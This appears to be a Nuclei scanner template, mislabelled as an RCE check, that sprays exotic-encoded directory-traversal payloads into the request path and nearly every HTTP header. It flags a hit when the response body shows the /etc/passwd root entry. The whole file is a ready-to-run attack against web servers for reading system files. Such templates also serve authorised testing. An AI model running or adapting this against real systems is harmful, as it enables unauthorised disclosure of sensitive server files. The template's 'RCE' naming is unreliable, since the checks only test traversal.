CVE_RCE2-1

CVE_RCE2-1.yaml

id: CVE_RCE2-1
info:
  name: CVE_RCE2
  author: 0x240x23elu
  severity: high

requests:

  - payloads:
      dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt



    attack: sniper  # Available options: sniper, pitchfork and clusterbomb
    threads: 50
    raw:
      # Request with simple param and header manipulation with DSL functions
      - |
        GET /§dirt§ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: Trailers
        Accept: */*
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: §dirt§
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: Trailers
        Accept: */*
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Accept-Encoding: gzip, deflate, br
        Referer: §dirt§
        Connection: keep-alive
        TE: Trailers
        Accept: */*
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Accept-Encoding: gzip, deflate, br
        Referer: {{BaseURL}}
        Connection: §dirt§
        TE: Trailers
        Accept: */*
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Accept-Encoding: gzip, deflate, br
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: §dirt§
        Accept: */*
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Accept-Encoding: gzip, deflate, br
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: Trailers
        Accept: §dirt§
        Accept-Encoding: */*
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: Trailers
        Accept: */*
        Accept-Encoding: §dirt§
        Accept-Language : */*
        Connection: */*
        Upgrade-Insecure-Requests: 1

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
        Referer: {{BaseURL}}
        Connection: keep-alive
        TE: Trailers
        Accept: */*
        Accept-Encoding: */*
        Accept-Language: §dirt§
        Upgrade-Insecure-Requests: 1


    matchers:
      - type: regex
        regex:
            - "root:[x*]:0:0:"
        part: body